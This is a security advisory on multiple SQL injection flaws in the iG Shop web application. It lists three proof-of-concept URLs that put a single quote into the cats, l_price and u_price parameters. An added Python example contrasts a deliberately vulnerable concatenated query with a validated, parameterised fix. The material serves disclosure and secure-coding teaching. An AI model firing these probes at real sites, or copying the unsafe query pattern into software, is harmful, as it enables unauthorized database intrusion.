source: https://www.securityfocus.com/bid/12627/info
iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
It is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed.
The following proofs of concept are available:
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search
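
The flaw class and its fix for the three parameters in the URLs above (cats, l_price, u_price), as an added example that is not iG Shop code and not part of the original advisory. It is written in Python with sqlite3 so it runs offline; the products table, its columns and all function names are assumptions, since the advisory does not show the application's queries.

```python
import re
import sqlite3

# Constructed schema and rows; the advisory does not show iG Shop's real tables.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products "
               "(id INTEGER PRIMARY KEY, cat_id INTEGER, name TEXT, price REAL)")
    db.executemany("INSERT INTO products (cat_id, name, price) VALUES (?, ?, ?)",
                   [(1, "mug", 4.5), (1, "poster", 12.0), (2, "lamp", 30.0)])
    return db

def search_unsafe(db, params):
    # Flaw class from the advisory: request values concatenated into the SQL text,
    # so a lone quote in l_price or u_price changes the statement itself.
    sql = ("SELECT name, price FROM products WHERE price >= " + params["l_price"]
           + " AND price <= " + params["u_price"])
    return db.execute(sql).fetchall()

INT_RE = re.compile(r"[0-9]{1,9}")
PRICE_RE = re.compile(r"[0-9]{1,9}(?:\.[0-9]{1,2})?")

def parse_param(params, name, pattern, cast):
    """Return None if the filter is absent, the typed value if well-formed, else raise."""
    raw = params.get(name)
    if raw is None or raw == "":
        return None
    if not isinstance(raw, str) or not pattern.fullmatch(raw):
        raise ValueError("invalid value for " + name)
    return cast(raw)

def search_safe(db, params):
    # Allow-list validation first, then bound placeholders: data never becomes SQL text.
    filters = (("cat_id = ?", parse_param(params, "cats", INT_RE, int)),
               ("price >= ?", parse_param(params, "l_price", PRICE_RE, float)),
               ("price <= ?", parse_param(params, "u_price", PRICE_RE, float)))
    sql, args = "SELECT name, price FROM products WHERE 1=1", []
    for clause, value in filters:
        if value is not None:
            sql += " AND " + clause
            args.append(value)
    return db.execute(sql + " ORDER BY id", args).fetchall()
```

With the quote value from the URLs above, search_unsafe fails inside the database with sqlite3.OperationalError, while search_safe rejects the request with ValueError before any SQL is built.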